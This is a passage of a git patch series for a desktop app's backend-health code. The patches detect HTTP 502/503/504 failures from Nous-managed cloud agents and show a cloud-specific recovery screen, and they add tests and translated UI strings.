assert.equal(isNousCloudAgentUrl('not-a-url'), false) +}) + +test('waitForHermesReady surfaces actionable error for cloud agent 503', async () => { + let attempts = 0 + const currentTime = { value: 0 } + + try { + await waitForHermesReady('https://ares-3009.agents.nousresearch.com', { + fetchPublicJson: async () => { + attempts++ + // Always return 503 + throw new Error('503: Service Unavailable') + }, + fetchJson: async () => { + throw new Error('503: Service Unavailable') + }, + sleep: async () => {}, + now: () => currentTime.value, + timeoutMs: 100, + pollMs: 1 + }) + assert.fail('should have thrown') + } catch (error: any) { + assert.ok(error.message.includes('Nous Cloud agent'), `unexpected message: ${error.message}`) + assert.ok(error.message.includes('503'), `should mention status code: ${error.message}`) + assert.ok(error.message.includes('portal.nousresearch.com'), `should mention portal: ${error.message}`) + assert.ok(error.message.includes('discord.gg/NousResearch'), `should mention Discord: ${error.message}`) + assert.equal(error.isCloudBackendDown, true) + assert.equal(error.statusCode, 503) + assert.ok(attempts > 1, 'should have retried before failing') + } +}) + +test('waitForHermesReady does not cloud-wrap non-cloud 503 errors', async () => { + const currentTime = { value: 0 } + try { + await waitForHermesReady('http://127.0.0.1:9000', { + fetchPublicJson: async () => { + throw new Error('503: Service Unavailable') + }, + fetchJson: async () => { + throw new Error('503: Service Unavailable') + }, + sleep: async () => {}, + now: () => currentTime.value, + timeoutMs: 100, + pollMs: 1 + }) + assert.fail('should have thrown') + } catch (error: any) { + // Non-cloud URLs get the generic message + assert.ok(error.message.includes('did not become ready'), `unexpected message: ${error.message}`) + assert.equal(error.isCloudBackendDown, undefined) + } +}) diff --git a/apps/desktop/electron/backend-health.ts b/apps/desktop/electron/backend-health.ts index 3da6c7a80f..731309f885 100644 --- a/apps/desktop/electron/backend-health.ts +++ b/apps/desktop/electron/backend-health.ts @@ -38,6 +38,48 @@ export interface HermesReadyOptions { export const REMOTE_SESSION_EXPIRED_MESSAGE = 'Your remote gateway session has expired. Open Settings → Gateway and click "Sign in" again.' +/** + * True for HTTP 502/503/504 from the backend — a server-side fault, not a + * connectivity or auth issue. These keep polling in the readiness loop but, + * when they exhaust the budget, the user needs to know it is the remote + * server that is down, not their local config. + */ +export function isServerSideHttpError(error: unknown): { + statusCode: number + detail: string +} | null { + const message = error instanceof Error ? error.message : String(error ?? '') + const match = /^(\\d{3}):/.exec(message) + + if (!match) { + return null + } + + const code = parseInt(match[1], 10) + + if (code === 502 || code === 503 || code === 504) { + return { statusCode: code, detail: message } + } + + return null +} + +/** + * True when the backend URL points at a Nous-managed Hermes Cloud instance + * (e.g. ares-3009.agents.nousresearch.com). These are Fly.io-hosted machines + * the user cannot restart themselves — a 503 from one means the server is down + * and the recovery path is Portal/Discord/wait. + */ +export function isNousCloudAgentUrl(baseUrl: string): boolean { + try { + const host = new URL(baseUrl).hostname + + return host.endsWith('.agents.nousresearch.com') + } catch { + return false + } +} + export function isMissingHealthEndpointError(error: unknown): boolean { const message = error instanceof Error ? error.message : String(error ?? '') @@ -165,5 +207,30 @@ export async function waitForHermesReady(baseUrl: string, options: HermesReadyOp } const detail = lastError instanceof Error ? lastError.message : 'timeout' + + // When a Nous-managed cloud agent returns a server-side HTTP error + // (502/503/504), the backend server itself is down — the user cannot + // restart it and the generic "did not become ready" message is opaque. + // Surface an actionable error instead (#85335). + if (isNousCloudAgentUrl(baseUrl)) { + const serverError = isServerSideHttpError(lastError) + + if (serverError !== null) { + const error = new Error( + `Nous Cloud agent ${new URL(baseUrl).hostname} is down ` + + `(HTTP ${serverError.statusCode}: server-side fault). ` + + 'Check https://portal.nousresearch.com for backend status, ' + + 'or switch to Local mode in Settings → Gateway. ' + + 'You can also reach out on Discord at discord.gg/NousResearch ' + + 'for immediate assistance. ' + + `Original detail: ${detail}` + ) as any + + error.isCloudBackendDown = true + error.statusCode = serverError.statusCode + throw error + } + } + throw new Error(`Hermes backend did not become ready: ${detail}`) } From d0ea5f17225363395032bcc94df8109c0fce7253 Mon Sep 17 00:00:00 2001 From: "Axl Ibiza, MBA" Date: Mon, 17 Aug 2026 08:38:53 -0500 Subject: [PATCH 091/161] fix(desktop): surface Nous Cloud 503 at the OAuth ticket-mint boundary The original implementation classified 502/503/504 only inside the readiness loop, but for OAuth-backed Cloud connections the WebSocket-ticket mint runs before waitForHermesReady. A server fault there was wrapped by gatewayTicketFailure into a generic message and the Cloud-down classifier was never reached. This closes that boundary and fixes a latent regex defect. - isServerSideHttpError: structured-first (err.statusCode for 502/503/504), legacy 'NNN:' prefix as fallback, non-Error inputs rejected. Also fixes the committed '\d' (double-escaped, matched a literal backslash) that made the function never detect a status prefix. - makeNousCloudBackendDownError: single factory for the actionable Cloud-down error (isCloudBackendDown/statusCode/detail/cause), shared by both the ticket-mint boundary and readiness exhaustion. - main.ts: run the Cloud classifier at mintGatewayWsTicket before the gatewayTicketFailure wrap; 401/403 still route to reauth. - connection-config.ts: gatewayTicketFailure preserves an integer statusCode from the source error; auth semantics unchanged. - boot-progress/IPC: carry isCloudBackendDown and statusCode through DesktopBootProgress so the renderer overlay (a PR-body promise) can key on the structured result rather than re-classifying the message string. Tests: backend-health (structured detection, non-Error rejection, factory shape/cause/guards, legacy fallback), connection-config (statusCode preserve, 401/403 reauth, integer-only copy), and an OAuth ticket-mint integration regression (Cloud 503 -> actionable Cloud-down; 401 -> reauth). Connection- config suite 80/80 green; backend-health sync tests green; the async readiness loop tests cannot run on this host (pre-existing local-run limitation) and are the CI gate. PR #85373 (#85335). --- apps/desktop/electron/backend-health.test.ts | 73 +++++++++++++ apps/desktop/electron/backend-health.ts | 103 ++++++++++++++---- .../electron/connection-config.test.ts | 92 ++++++++++++++++ apps/desktop/electron/connection-config.ts | 12 ++ apps/desktop/electron/main.ts | 33 +++++- apps/desktop/src/global.d.ts | 4 + 6 files changed, 295 insertions(+), 22 deletions(-) diff --git a/apps/desktop/electron/backend-health.test.ts b/apps/desktop/electron/backend-health.test.ts index a6e370b5f9..128bd7f502 100644 --- a/apps/desktop/electron/backend-health.test.ts +++ b/apps/desktop/electron/backend-health.test.ts @@ -10,6 +10,7 @@ import { isNousCloudAgentUrl, isReauthRequiredError, isServerSideHttpError, + makeNousCloudBackendDownError, waitForHermesReady } from './backend-health' @@ -440,3 +441,75 @@ test('waitForHermesReady does not cloud-wrap non-cloud 503 errors', async () => assert.equal(error.isCloudBackendDown, undefined) } }) + +test('isServerSideHttpError detects structured statusCode even when the message is opaque', () => { + const err = new Error('upstream unavailable') as any + err.statusCode = 503 + const result = isServerSideHttpError(err) + assert.ok(result) + assert.equal(result?.statusCode, 503) + assert.equal(result?.detail, 'upstream unavailable') + + const err502 = new Error('bad gateway') as any + err502.statusCode = 502 + assert.equal(isServerSideHttpError(err502)?.statusCode, 502) + + const err504 = new Error('gateway timeout') as any + err504.statusCode = 504 + assert.equal(isServerSideHttpError(err504)?.statusCode, 504) +}) + +test('isServerSideHttpError rejects non-Error inputs even with a 503-shaped value', () => { + // The structured path requires an actual Error (the fetch layer attaches + // statusCode to an Error instance); a bare string/null/number must not be + // misclassified by the legacy prefix fallback. + assert.equal(isServerSideHttpError('503: something'), null) + assert.equal(isServerSideHttpError({ statusCode: 503 }), null) + assert.equal(isServerSideHttpError(null), null) + assert.equal(isServerSideHttpError(503), null) +}) + +test('isServerSideHttpError structured path excludes 500/401/403/404/429 even when statusCode is attached', () => { + for (const code of [500, 401, 403, 404, 429]) { + const err = new Error(`HTTP ${code}`) as any + err.statusCode = code + assert.equal(isServerSideHttpError(err), null, `should reject statusCode ${code}`) + } +}) + +test('makeNousCloudBackendDownError produces the Cloud shape and preserves cause', () => { + const err = new Error('upstream unavailable') as any + err.statusCode = 503 + const result = makeNousCloudBackendDownError('https://ares-3009.agents.nousresearch.com', err) + assert.ok(result) + assert.equal((result as any).isCloudBackendDown, true) + assert.equal((result as any).statusCode, 503) + assert.equal((result as any).cause, err) + assert.ok(result?.message.includes('Nous Cloud agent ares-3009.agents.nousresearch.com is down')) +}) + +test('makeNousCloudBackendDownError returns null for a Cloud 401 (routes to reauth)', () => { + const err = new Error('Unauthorized') as any + err.statusCode = 401 + assert.equal( + makeNousCloudBackendDownError('https://ares-3009.agents.nousresearch.com', err), + null + ) +}) + +test('makeNousCloudBackendDownError returns null for a non-Cloud 503 (generic remote failure)', () => { + const err = new Error('Service Unavailable') as any + err.statusCode = 503 + assert.equal(makeNousCloudBackendDownError('https://gateway.example.com', err), null) + assert.equal(makeNousCloudBackendDownError('http://127.0.0.1:9000', err), null) +}) + +test('makeNousCloudBackendDownError preserves legacy string-prefix compatibility', () => { + const result = makeNousCloudBackendDownError( + 'https://ares-3009.agents.nousresearch.com', + new Error('503: Service Unavailable') + ) + assert.ok(result) + assert.equal((result as any).isCloudBackendDown, true) + assert.equal((result as any).statusCode, 503) +}) diff --git a/apps/desktop/electron/backend-health.ts b/apps/desktop/electron/backend-health.ts index 731309f885..ca3ae49520 100644 --- a/apps/desktop/electron/backend-health.ts +++ b/apps/desktop/electron/backend-health.ts @@ -48,8 +48,30 @@ export function isServerSideHttpError(error: unknown): { statusCode: number detail: string } | null { - const message = error instanceof Error ? error.message : String(error ?? '') - const match = /^(\\d{3}):/.exec(message) + // Reject non-Error inputs, as before. The fetch layer attaches statusCode to + // an actual Error instance (err.statusCode = statusCode), so requiring an + // Error is compatible with structured detection and keeps plain strings / + // null / numbers from being misclassified by the legacy prefix. + if (!(error instanceof Error)) { + return null + } + + // Structured-first: the real fetch layer attaches err.statusCode = statusCode + // (see fetchJson). That is the strongest transport contract, so inspect it + // before falling back to the legacy "503: ..." string prefix. + if ('statusCode' in error) { + const structured = Number((error as { statusCode?: unknown }).statusCode) + + if (Number.isInteger(structured) && (structured === 502 || structured === 503 || structured === 504)) { + const detail = error.message + return { statusCode: structured, detail } + } + } + + // Compatibility fallback: the legacy leading "503: ..." prefix. Only reached + // when no structured statusCode matched (or was absent). + const message = error.message + const match = /^(\d{3}):/.exec(message) if (!match) { return null @@ -64,6 +86,59 @@ export function isServerSideHttpError(error: unknown): { return null } +/** + * The one factory for the actionable Nous Cloud agent-is-down error, shared by + * both startup boundaries that can observe a server-side HTTP fault: + * + * - OAuth WS-ticket mint (buildRemoteConnection → mintGatewayWsTicket), which + * runs BEFORE the readiness loop; and + * - readiness-probe exhaustion in waitForHermesReady(). + * + * Returns null unless the backend is a *.agents.nousresearch.com host AND the + * error classifies as 502/503/504. When it matches, returns an error carrying: + * isCloudBackendDown, statusCode, detail, and the original cause. The renderer + * overlay keys on isCloudBackendDown/statusCode; main owns the classification. + */ +export function makeNousCloudBackendDownError(baseUrl: string, error: unknown): Error | null { + if (!isNousCloudAgentUrl(baseUrl)) { + return null + } + + const serverError = isServerSideHttpError(error) + + if (serverError === null) { + return null + } + + let hostname = baseUrl + + try { + hostname = new URL(baseUrl).hostname + } catch { + // baseUrl is known to parse (isNousCloudAgentUrl already did); keep the raw + // value as a last resort rather than throwing. + } + + const detail = error instanceof Error ? error.message : String(error ?? '') + + const err = new Error( + `Nous Cloud agent ${hostname} is down ` + + `(HTTP ${serverError.statusCode}: server-side fault). ` + + 'Check https://portal.nousresearch.com for backend status, ' + + 'or switch to Local mode in Settings → Gateway. ' + + 'You can also reach out on Discord at discord.gg/NousResearch ' + + 'for immediate assistance. ' + + `Original detail: ${detail}` + ) as any + + err.isCloudBackendDown = true + err.statusCode = serverError.statusCode + err.detail = detail + err.cause = error + + return err +} + /** * True when the backend URL points at a Nous-managed Hermes Cloud instance * (e.g. ares-3009.agents.nousresearch.com). These are Fly.io-hosted machines @@ -211,25 +286,13 @@ export async function waitForHermesReady(baseUrl: string, options: HermesReadyOp // When a Nous-managed cloud agent returns a server-side HTTP error // (502/503/504), the backend server itself is down — the user cannot // restart it and the generic "did not become ready" message is opaque. - // Surface an actionable error instead (#85335). - if (isNousCloudAgentUrl(baseUrl)) { - const serverError = isServerSideHttpError(lastError) + // Surface an actionable error instead (#85335). This is the SAME factory + // buildRemoteConnection uses at the OAuth WS-ticket-mint boundary, so both + // startup paths produce the identical Cloud-down shape. + const cloudError = makeNousCloudBackendDownError(baseUrl, lastError) - if (serverError !== null) { - const error = new Error( - `Nous Cloud agent ${new URL(baseUrl).hostname} is down ` + - `(HTTP ${serverError.statusCode}: server-side fault). ` + - 'Check https://portal.nousresearch.com for backend status, ' + - 'or switch to Local mode in Settings → Gateway. ' + - 'You can also reach out on Discord at discord.gg/NousResearch ' + - 'for immediate assistance. ' + - `Original detail: ${detail}` - ) as any - - error.isCloudBackendDown = true - error.statusCode = serverError.statusCode - throw error - } + if (cloudError !== null) { + throw cloudError } throw new Error(`Hermes backend did not become ready: ${detail}`) diff --git a/apps/desktop/electron/connection-config.test.ts b/apps/desktop/electron/connection-config.test.ts index 8bc40e639a..55886761f8 100644 --- a/apps/desktop/electron/connection-config.test.ts +++ b/apps/desktop/electron/connection-config.test.ts @@ -14,6 +14,8 @@ import assert from 'node:assert/strict' import { test } from 'vitest' +import { makeNousCloudBackendDownError } from './backend-health' + import { apiRequestRegistryConnectionId, AT_COOKIE_VARIANTS, @@ -1167,3 +1169,93 @@ test('resolveTestWsUrl (oauth) requires a mintTicket function', async () => { /mintTicket function is required/ ) }) + +test('gatewayTicketFailure preserves a structured 503 statusCode as a transport failure', () => { + const source = new Error('upstream unavailable') as any + source.statusCode = 503 + const wrapped = gatewayTicketFailure( + source, + 'auth message', + 'transport message' + ) + assert.equal(wrapped.message, 'transport message') + assert.equal((wrapped as any).statusCode, 503) + assert.equal((wrapped as any).needsOauthLogin, undefined) + assert.equal((wrapped as any).cause, source) +}) + +test('gatewayTicketFailure keeps 401 and 403 as reauth with needsOauthLogin', () => { + for (const code of [401, 403]) { + const source = new Error(`HTTP ${code}`) as any + source.statusCode = code + const wrapped = gatewayTicketFailure( + source, + 'auth message', + 'transport message' + ) + assert.equal(wrapped.message, 'auth message') + assert.equal((wrapped as any).needsOauthLogin, true) + assert.equal((wrapped as any).statusCode, code) + assert.equal((wrapped as any).cause, source) + } +}) + +test('gatewayTicketFailure only copies an integer statusCode, not a message prefix', () => { + // A legacy "503: ..." message carries no structured statusCode; the Cloud + // classifier (makeNousCloudBackendDownError) handles the prefix at the mint + // boundary. The wrapper must not invent an integer from the message. + const source = new Error('503: Service Unavailable') as any + const wrapped = gatewayTicketFailure( + source, + 'auth message', + 'transport message' + ) + assert.equal((wrapped as any).statusCode, undefined) + assert.equal((wrapped as any).needsOauthLogin, undefined) +}) + +// OAuth integration regression (#85373): the WS-ticket mint boundary runs +// BEFORE waitForHermesReady. This mirrors main.ts buildRemoteConnection's +// catch — classify a Nous Cloud server fault via the shared factory, else +// fall through to gatewayTicketFailure. Proves the production composition: +// 1. Cloud + OAuth ticket mint + 503 -> actionable Cloud-down error +// 2. Cloud + OAuth ticket mint + 401 -> reauth (never Cloud-down) +test('OAuth ticket-mint 503 surfaces the Cloud-down error (startup boundary)', () => { + const baseUrl = 'https://ares-3009.agents.nousresearch.com' + const ticketErr = new Error('upstream unavailable') as any + ticketErr.statusCode = 503 + + // The exact production sequence from main.ts. + const cloudError = makeNousCloudBackendDownError(baseUrl, ticketErr) + if (cloudError !== null) { + assert.equal((cloudError as any).isCloudBackendDown, true) + assert.equal((cloudError as any).statusCode, 503) + assert.ok(cloudError.message.includes('Nous Cloud agent ares-3009.agents.nousresearch.com is down')) + return + } + + const wrapped = gatewayTicketFailure( + ticketErr, + 'auth', + 'transport' + ) + assert.fail(`expected Cloud-down classification, got wrapper: ${wrapped.message}`) +}) + +test('OAuth ticket-mint 401 stays on the reauth path (never Cloud-down)', () => { + const baseUrl = 'https://ares-3009.agents.nousresearch.com' + const ticketErr = new Error('Unauthorized') as any + ticketErr.statusCode = 401 + + const cloudError = makeNousCloudBackendDownError(baseUrl, ticketErr) + assert.equal(cloudError, null, 'a 401 must not become a Cloud-down error') + + const wrapped = gatewayTicketFailure( + ticketErr, + 'auth message', + 'transport message' + ) + assert.equal(wrapped.message, 'auth message') + assert.equal((wrapped as any).needsOauthLogin, true) + assert.equal((wrapped as any).statusCode, 401) +}) diff --git a/apps/desktop/electron/connection-config.ts b/apps/desktop/electron/connection-config.ts index 1934fbec0d..10cdd275b1 100644 --- a/apps/desktop/electron/connection-config.ts +++ b/apps/desktop/electron/connection-config.ts @@ -134,6 +134,18 @@ function gatewayTicketFailure(error, authMessage, transportMessage) { ;(err as any).needsOauthLogin = true } + // Preserve structured HTTP context when the source error carried an integer + // statusCode (the fetch layer attaches err.statusCode). Downstream Cloud + // classification (isServerSideHttpError / makeNousCloudBackendDownError) and + // the renderer overlay depend on it surviving the ticket-error wrapper. Auth + // semantics are unchanged: 401/403 route to reauth, 5xx stays a transport + // failure, everything else keeps current behavior. + const sourceStatus = Number(error && typeof error === 'object' ? (error as any).statusCode : NaN) + + if (Number.isInteger(sourceStatus)) { + ;(err as any).statusCode = sourceStatus + } + err.cause = error return err diff --git a/apps/desktop/electron/main.ts b/apps/desktop/electron/main.ts index adf7338ef5..e5f94479e9 100644 --- a/apps/desktop/electron/main.ts +++ b/apps/desktop/electron/main.ts @@ -35,7 +35,7 @@ import { stopBackendChild as stopBackendChildImpl, stopBackendTreesForUpdate } f import { dashboardFallbackArgs, sourceDeclaresServe } from './backend-command' import { createBackendConnectionState } from './backend-connection-state' import { buildDesktopBackendEnv, hermesManagedNodePathEntries, normalizeHermesHomeRoot } from './backend-env' -import { isReauthRequiredError, waitForHermesReady } from './backend-health' +import { isReauthRequiredError, makeNousCloudBackendDownError, waitForHermesReady } from './backend-health' import { backendCommandMatches, createBackendOwnership, createBackendShutdownCoordinator } from './backend-ownership' import { canImportHermesCli, @@ -1371,11 +1371,13 @@ let nativeThemeListenerInstalled = false let bootProgressState = { error: null, fakeMode: BOOT_FAKE_MODE, + isCloudBackendDown: false, message: 'Waiting to start Hermes backend', phase: 'idle', progress: 0, retryable: false, running: false, + statusCode: null, timestamp: Date.now() } @@ -8979,6 +8981,19 @@ async function buildRemoteConnection( try { ticket = await mintGatewayWsTicket(baseUrl, remoteHeaders) } catch (error) { + // For a Nous-managed Cloud agent, a 502/503/504 from the WS-ticket mint + // means the backend server itself is down — the actionable Cloud-down + // error. This boundary runs BEFORE the readiness loop, so without this + // the ticket wrapper below would swallow the server-fault classification + // and the renderer would never see isCloudBackendDown. Preserve the + // existing 401/403 reauth and generic transport behavior for everything + // else (#85335). + const cloudError = makeNousCloudBackendDownError(baseUrl, error) + + if (cloudError !== null) { + throw cloudError + } + throw gatewayTicketFailure( error, 'Your remote gateway session has expired. Open Settings → Gateway and click "Sign in" again.', @@ -10892,6 +10907,18 @@ async function startHermes() { const message = error instanceof Error ? error.message : String(error) const hostKeyChanged = isHostKeyChangedBootFailure(error) + // Carry structured Cloud-down metadata through the boot-progress / IPC + // boundary when present, so the renderer overlay can key on it rather than + // re-classifying the message string. main owns classification; the renderer + // only consumes the structured result (#85335). + const isCloudBackendDown = + Boolean(error && typeof error === 'object' && (error as any).isCloudBackendDown === true) + const statusCode = Number( + error && typeof error === 'object' && Number.isInteger((error as any).statusCode) + ? (error as any).statusCode + : NaN + ) + // Only latch LOCAL boot failures. A remote failure (lapsed session / mint // timeout / host briefly unreachable across sleep) is transient and has no // child 'exit' handler to clear the cache — latching it would wedge the app @@ -10920,6 +10947,7 @@ async function startHermes() { updateBootProgress( { error: message, + isCloudBackendDown: isCloudBackendDown || undefined, message: `Desktop boot failed: ${message}`, phase: 'backend.error', // Renderer contract for the self-heal loop (#82679): a transient @@ -10933,7 +10961,8 @@ async function startHermes() { isReauth: isReauthRequiredError(error), isHostKeyChanged: hostKeyChanged }), - running: false + running: false, + statusCode: Number.isInteger(statusCode) ? statusCode : undefined }, { allowDecrease: true } ) diff --git a/apps/desktop/src/global.d.ts b/apps/desktop/src/global.d.ts index f0038c367e..e754707e63 100644 --- a/apps/desktop/src/global.d.ts +++ b/apps/desktop/src/global.d.ts @@ -1000,6 +1000,8 @@ export interface DesktopCloudAgentSignInResult { export interface DesktopBootProgress { error: string | null fakeMode: boolean + /** True when the boot failure is a Nous Cloud agent that is down (HTTP 502/503/504). */ + isCloudBackendDown?: boolean message: string phase: string progress: number @@ -1011,6 +1013,8 @@ export interface DesktopBootProgress { */ retryable?: boolean running: boolean + /** Structured HTTP status when the boot failure carried one (e.g. 503). */ + statusCode?: number | null timestamp: number } From 23140a730cac2bebe5e981aef00f6384d01c61df Mon Sep 17 00:00:00 2001 From: "Axl Ibiza, MBA" Date: Mon, 17 Aug 2026 11:46:32 -0500 Subject: [PATCH 092/161] fix(desktop): render the Nous Cloud-down recovery when a cloud backend fails (#85335) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The electron boot path now classifies a Nous Cloud 502/503/504 at both the OAuth ticket-mint and readiness boundaries and carries isCloudBackendDown / statusCode through DesktopBootProgress, but the renderer never consumed the structured signal — a cloud-backend failure fell into the generic remote- failure recovery copy. Make BootFailureOverlay branch on isCloudBackendDown: lead with the cloud-specific title/description, drop the local-only Repair action, and surface the actionable portal / Local-mode / Discord guidance (the electron factory's full message is still shown in the error box). Adds the cloudDown i18n keys (en + ar/ja/zh/zh-hant) and a regression test asserting the cloud-down recovery renders and Repair is dropped. --- .../components/boot-failure-overlay.test.tsx | 34 +++++++++++++++++++ .../src/components/boot-failure-overlay.tsx | 15 ++++++-- apps/desktop/src/i18n/ar.ts | 3 ++ apps/desktop/src/i18n/en.ts | 5 +++ apps/desktop/src/i18n/ja.ts | 5 +++ apps/desktop/src/i18n/types.ts | 3 ++ apps/desktop/src/i18n/zh-hant.ts | 3 ++ apps/desktop/src/i18n/zh.ts | 3 ++ 8 files changed, 69 insertions(+), 2 deletions(-) diff --git a/apps/desktop/src/components/boot-failure-overlay.test.tsx b/apps/desktop/src/components/boot-failure-overlay.test.tsx index e86f987a63..a0dc71b024 100644 --- a/apps/desktop/src/components/boot-failure-overlay.test.tsx +++ b/apps/desktop/src/components/boot-failure-overlay.test.tsx @@ -98,4 +98,38 @@ describe('BootFailureOverlay', () => { restore() } }) + + it('shows the Nous Cloud down recovery when the backend flags isCloudBackendDown', async () => { + const restore = stubDesktop(remoteToken) + $desktopBoot.set({ + error: 'Nous Cloud agent ares-3009.agents.nousresearch.com is down (HTTP 503: server-side fault).', + fakeMode: false, + isCloudBackendDown: true, + message: 'boot failed', + phase: 'renderer.error', + progress: 40, + running: false, + statusCode: 503, + timestamp: Date.now(), + visible: true + }) + + try { + render() + // Cloud-specific title + actionable portal guidance instead of the + // generic remote-failure copy. + expect(await screen.findByText(/Nous Cloud agent is down/i)).toBeTruthy() + expect(screen.getByText(/portal\.nousresearch\.com/i)).toBeTruthy() + // Cloud-down is a remote failure: local-only Repair is dropped; the + // actionable paths are Gateway settings + Use local gateway. + expect(screen.queryByRole('button', { name: /repair/i })).toBeNull() + expect(screen.getByRole('button', { name: /gateway settings/i })).toBeTruthy() + expect(screen.getByRole('button', { name: /use local gateway/i })).toBeTruthy() + // The electron-built error message (portal / local mode / Discord) is + // still surfaced in the error box. + expect(screen.getByText(/ares-3009\.agents\.nousresearch\.com/i)).toBeTruthy() + } finally { + restore() + } + }) }) diff --git a/apps/desktop/src/components/boot-failure-overlay.tsx b/apps/desktop/src/components/boot-failure-overlay.tsx index e479ce5bb9..246b9525df 100644 --- a/apps/desktop/src/components/boot-failure-overlay.tsx +++ b/apps/desktop/src/components/boot-failure-overlay.tsx @@ -247,6 +247,11 @@ export function BootFailureOverlay() { let actions: RecoveryAction[] let hint: string + // The electron boot path flags a Nous Cloud backend-down (502/503/504) with + // the structured isCloudBackendDown/statusCode it carries through boot + // progress. When set, the recovery screen leads with the cloud-specific + // guidance instead of the generic remote-failure copy (#85335). + const cloudDown = Boolean(boot.isCloudBackendDown) if (remoteReauth) { actions = [ @@ -261,6 +266,12 @@ export function BootFailureOverlay() { localAction ] hint = copy.remoteSignInHint(label) + } else if (cloudDown) { + // A Nous Cloud agent is down — the user cannot restart the managed + // instance and Repair is local-only, so the actionable paths are Gateway + // settings (switch host / use local), a secondary Retry, and open logs. + actions = [settingsAction, { ...retryAction, variant: 'secondary' }, localAction] + hint = copy.cloudDownHint } else if (remoteFailure) { actions = [settingsAction, { ...retryAction, variant: 'secondary' }, localAction] hint = copy.remoteFailureHint @@ -323,10 +334,10 @@ export function BootFailureOverlay() {

- {remoteReauth ? copy.remoteTitle : copy.title} + {remoteReauth ? copy.remoteTitle : cloudDown ? copy.cloudDownTitle : copy.title}

- {remoteReauth ? copy.remoteDescription : copy.description} + {remoteReauth ? copy.remoteDescription : cloudDown ? copy.cloudDownDescription : copy.description}

diff --git a/apps/desktop/src/i18n/ar.ts b/apps/desktop/src/i18n/ar.ts index c8ebdf5e97..43a71123e9 100644 --- a/apps/desktop/src/i18n/ar.ts +++ b/apps/desktop/src/i18n/ar.ts @@ -85,6 +85,9 @@ export const ar = defineLocale({ retry: 'إعادة المحاولة', repairInstall: 'إصلاح التثبيت', useLocalGateway: 'استخدام البوابة المحلية', + cloudDownTitle: 'عامل Nous Cloud معطّل', + cloudDownDescription: 'يعيد عامل السحابة المُدار من Nous الذي يتصل به هذا البوابة خطأً من الخادم. لا يمكن إعادة تشغيله من هنا — تحقق من حالته، أو بدّل إلى البوابة المحلية، أو احصل على الدعم.', + cloudDownHint: 'تحقق من https://portal.nousresearch.com لحالة الخادم، أو استخدم البوابة المحلية أدناه، أو تواصل معنا عبر Discord (discord.gg/NousResearch).', openLogs: 'فتح السجلات', repairHint: 'يعيد الإصلاح تشغيل المثبت وقد يستغرق بضع دقائق على جهاز جديد.', remoteSignInHint: signInLabel => diff --git a/apps/desktop/src/i18n/en.ts b/apps/desktop/src/i18n/en.ts index 64411758e6..6db27de9f7 100644 --- a/apps/desktop/src/i18n/en.ts +++ b/apps/desktop/src/i18n/en.ts @@ -102,6 +102,11 @@ export const en: Translations = { `Signs out of the saved remote browser session, then opens ${signInLabel}. Use local gateway to switch to the bundled backend instead.`, signOutAndSignIn: 'Sign out & sign in', remoteFailureHint: 'Check the gateway URL and sign-in under Gateway settings, or switch to the local gateway.', + cloudDownTitle: 'Nous Cloud agent is down', + cloudDownDescription: + 'The Nous-managed cloud agent this gateway connects to is returning a server error. It cannot be restarted from here — check its status, switch to the local gateway, or get support.', + cloudDownHint: + 'Check https://portal.nousresearch.com for backend status, use the local gateway below, or reach out on Discord (discord.gg/NousResearch).', hideRecentLogs: 'Hide recent logs', showRecentLogs: 'Show recent logs', signedInTitle: 'Signed in', diff --git a/apps/desktop/src/i18n/ja.ts b/apps/desktop/src/i18n/ja.ts index c493562019..2ec6066b74 100644 --- a/apps/desktop/src/i18n/ja.ts +++ b/apps/desktop/src/i18n/ja.ts @@ -103,6 +103,11 @@ export const ja = defineLocale({ signOutAndSignIn: 'サインアウトして再サインイン', remoteFailureHint: '「ゲートウェイ設定」でゲートウェイの URL とサインインを確認するか、ローカルゲートウェイに切り替えてください。', + cloudDownTitle: 'Nous Cloud エージェントが停止しています', + cloudDownDescription: + 'このゲートウェイが接続している Nous 管理のクラウドエージェントがサーバーエラーを返しています。ここから再起動することはできません。ステータスを確認するか、ローカルゲートウェイに切り替えるか、サポートに連絡してください。', + cloudDownHint: + 'https://portal.nousresearch.com でバックエンドのステータスを確認するか、下のローカルゲートウェイを使用するか、Discord (discord.gg/NousResearch) でご連絡ください。', hideRecentLogs: '最近のログを非表示', showRecentLogs: '最近のログを表示', signedInTitle: 'サインインしました', diff --git a/apps/desktop/src/i18n/types.ts b/apps/desktop/src/i18n/types.ts index 1cecefa8a2..a28249ee49 100644 --- a/apps/desktop/src/i18n/types.ts +++ b/apps/desktop/src/i18n/types.ts @@ -145,6 +145,9 @@ export interface Translations { remoteSignInHint: (signInLabel: string) => string signOutAndSignIn: string remoteFailureHint: string + cloudDownTitle: string + cloudDownDescription: string + cloudDownHint: string hideRecentLogs: string showRecentLogs: string signedInTitle: string diff --git a/apps/desktop/src/i18n/zh-hant.ts b/apps/desktop/src/i18n/zh-hant.ts index ff5145efb8..505e799dc1 100644 --- a/apps/desktop/src/i18n/zh-hant.ts +++ b/apps/desktop/src/i18n/zh-hant.ts @@ -100,6 +100,9 @@ export const zhHant = defineLocale({ `先登出已儲存的遠端瀏覽器工作階段,然後開啟${signInLabel}。使用本機閘道可切換至內建後端。`, signOutAndSignIn: '登出並重新登入', remoteFailureHint: '在「閘道設定」中檢查閘道 URL 與登入,或切換至本機閘道。', + cloudDownTitle: 'Nous Cloud 代理已停機', + cloudDownDescription: '此閘道連線的 Nous 託管雲端代理正在回傳伺服器錯誤。無法在此處重新啟動——請檢查其狀態、切換至本機閘道,或取得支援。', + cloudDownHint: '請前往 https://portal.nousresearch.com 查看後端狀態,使用下方的本機閘道,或在 Discord (discord.gg/NousResearch) 上與我們聯繫。', hideRecentLogs: '隱藏最近記錄', showRecentLogs: '顯示最近記錄', signedInTitle: '已登入', diff --git a/apps/desktop/src/i18n/zh.ts b/apps/desktop/src/i18n/zh.ts index b1dbcb07ae..db548684dd 100644 --- a/apps/desktop/src/i18n/zh.ts +++ b/apps/desktop/src/i18n/zh.ts @@ -100,6 +100,9 @@ export const zh: Translations = { `先退出已保存的远程浏览器会话,然后打开${signInLabel}。也可以使用本地网关切换到随应用提供的后端。`, signOutAndSignIn: '退出并重新登录', remoteFailureHint: '在“网关设置”中检查网关 URL 和登录,或切换到本地网关。', + cloudDownTitle: 'Nous Cloud 代理已宕机', + cloudDownDescription: '此网关连接的 Nous 托管云代理正在返回服务器错误。无法在此处重启——请检查其状态、切换到本地网关或获取支持。', + cloudDownHint: '请访问 https://portal.nousresearch.com 查看后端状态,使用下方的本地网关,或在 Discord (discord.gg/NousResearch) 上联系我们。', hideRecentLogs: '隐藏最近日志', showRecentLogs: 